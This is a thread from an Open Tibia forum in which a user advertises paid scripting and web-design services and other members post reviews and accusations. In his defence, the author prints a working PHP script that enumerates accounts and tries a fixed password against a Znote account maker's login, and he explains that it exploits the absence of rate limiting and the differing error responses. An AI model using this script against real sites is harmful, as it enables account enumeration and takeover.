• There is NO official Otland's Discord server and NO official Otland's server list. The Otland's Staff does not manage any Discord server or server list. Moderators or administrator of any Discord server or server lists have NO connection to the Otland's Staff. Do not get scammed!

C++/LUA/PHP + web design services

Azakelis

Premium User
Premium User
Solutions
Reaction score
Are you looking for a source edit in C++ or a lua script?
Do you want to extend your website capabilites or perhaps are you looking for a new web design such as layout for your account maker?
Are you having any problems with setting up your server or want to learn coding yourself?

If you answered yes to any of these questions you came to the right place.

Private message me for more information, the price will be adequate to your task.

Some of my work:

LUA:
A remaster of an older script ( Action - Advanced quest chests 1.x (https://otland.net/threads/advanced-quest-chests-1-x.249678/) )

C++:
An example of source edit that no one was willing to do that I did in my spare time.

WEB:
Just a quick script that has been made some time ago that was released for free.

TOOLS:
An old tool that wasn't designed for public use, open sourced because of some demand.

Last edited by a moderator:
Recommended, the craziest Polish guy i've ever meet, works fast, if you can imagine, he could do.

Not recommended.
Copies others scripts, changes few lines out of thousand and uses as his work. "Remaster of an older script", what the... How is my script old (last update 18 days ago)? Also I actually checked this script and it's very bad quality, please don't call it "remaster" of my script, disgraceful.
Remove this line
Even better, he got some random PHP script from Google that uses curl to send POST requests and tries to extort money because he "can hack your server accounts". People literally messaged me about this, had good laugh after reading this script. Stupid scriptkiddies.

If he does something for you, just be aware that 90% of the code is either from others scripts or Stackoverflow 🤣

Last edited:
Let me address that:

Copies others scripts, changes few lines out of thousand and uses as his work. "Remaster of an older script", what the...
Well the connection between our scripts is obvious. Mine is based on yours (but I only took the ideas not the actual code) hence the "remaster"

How is my script old (last update 18 days ago)?
It might be still updated and developed but the code is dated. It is originally from 2019 it might seem like not a lot but looking through the git history you seem not to care about the maintainability of the code by other people than yourself.

Also I actually checked this script and it's very bad quality,
I personally do not think so. Yes there are some things that I admit I didn't put my best into and I would like to refactor those parts of the code.
I will let everyone decide on their own which version suits their needs.
please don't call it "remaster" of my script, disgraceful.
Remove this line
I am willing to do that if you wish so. Consider it done. #edit: actually I'm unable to edit the thread.

Even better, he got some random PHP script from Google that uses curl to send POST requests and tries to extort money because he "can hack your server accounts". People literally messaged me about this, had good laugh after reading this script. Stupid scriptkiddies.
That's a interesting one. There is some truth in that. Let me give some context.
So there was that server that I won't name that I enjoyed playing but it had some issues/bugs and was exploitable I offered some solutions and my work on it for free to one of the admins. I've told him on private messages what bugs are there on the server and also as a side note of a possible exploit on the website I had done this quick script:

PHP:
<?php
ini_set('max_execution_time', 0);
for ($i = 100000; $i < 1000000; $i++) {
$post_data['username'] = $i;
$post_data['password'] = '123456';

foreach ( $post_data as $key => $value) {
    $post_items[] = $key . '=' . $value;
}

$post_string = implode ('&', $post_items);

$curl_connection =
  curl_init('[REDACTED]');

curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($curl_connection, CURLOPT_USERAGENT,
  "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);

curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post_string);

$result = curl_exec($curl_connection);

$info = curl_getinfo($curl_connection);
$size = $info["size_download"];

if ($size == 7103) {
    $file = fopen('owned.txt', 'w');
    fwrite($file, $post_data['username'] . "\n");
    fclose($file);
}

file_put_contents('current.txt', $i);

curl_close($curl_connection);
}
?>
It is a quick hack and indeed uses literal copy pasted code from stackoverflow because I was too lazy to write something just to make a point to someone that didn't seem to get it. So what the hell is it even? So let me explain if you don't get the code just by reading it. I wouldn't either it is a terrible piece of code. So what it really does is it exploits a znote login system - the znote account maker not only permits any number of requests for logging in without any cooldown period it also returns different messages if account doesn't exist and if the password is invalid. Since it returns the same http status code and I was too lazy to use something like dom to extract the value it uses constant size of downloaded file (7103) that means that such account exists but the password is invalid.

Let me actually post a screen.
1611228131587.png
translation polish -> english:
ME:
i doubt that someone here would like to destroy this ots
and even if he wanted to he probably doesn't know
how
NOT ME:
:0
:0
:)
What do you offer?
ME:
i'll get a gm on the ots
and i will help you
i don't want any money
because i have too much already so some cash
doesn't make a difference for me
xd
the gameplay here is great it's been a long time since i've played any server
so i would like the server to be great too
you dont need to worry about the map or whatever
because it is great
perhaps it is bought
i don't even need to be near it
because i'm a terrible mapper anyway
The answer for me being in the team of this server was a no and I think the admins took all of that as a threat hence all of the stuff oen wrote.
I did accept that no and moved on but I still kept reporting issues to the admins.
Also recently I've linked this thread to one of the admins of this server to still show that I do offer my services if they would need any but this time as a paid service - a bit of shameless marketing I'd say.
If he does something for you, just be aware that 90% of the code is either from others scripts or Stackoverflow 🤣
Yes I admit I'm using any resource that I might need to complete any task given. Stackoverflow is a great resource as is documentation but I do not copy and paste blindly from stackoverflow in any of my paid works.
I actually wish it was that simple just copy and paste.

It might be still updated and developed but the code is dated. It is originally from 2019 it might seem like not a lot but looking through the git history you seem not to care about the maintainability of the code by other people than yourself.
Good one. Lots of people were actually happy with how easy it's to edit this script and add own code (actually that's the case in 99% of my work, I'm mostly known for readable and easy to maintain code).
I am willing to do that if you wish so. Consider it done. #edit: actually I'm unable to edit the thread.
Thanks, if you can't edit anymore then report it with instructions and mods will edit it for you.

I needed some modifications to the OTC modules, and he made them perfect, as I wanted. Very fast and efficient.
I RECOMMEND

I did not understand Oen432's complaint. If you claim that he copied some code, you should go to the post where he copied the code and complain, and not in this tab.

Recommended. Great and friendly guy and an extremely professional programmer. Taught me several things about coding and his work is really impressive.

Very recommended, made everything faster than light and quality of script was insane easy to configure. Explain everything and give tips how systems should look like and work. Fully Recommend !!!

Not recommended.

I made a request on 7/21, he said it was a quick and easy thing, and he would deliver it to me the next day. I forwarded some messages asking about the system, he hasn't answered any until today 7/26.

Back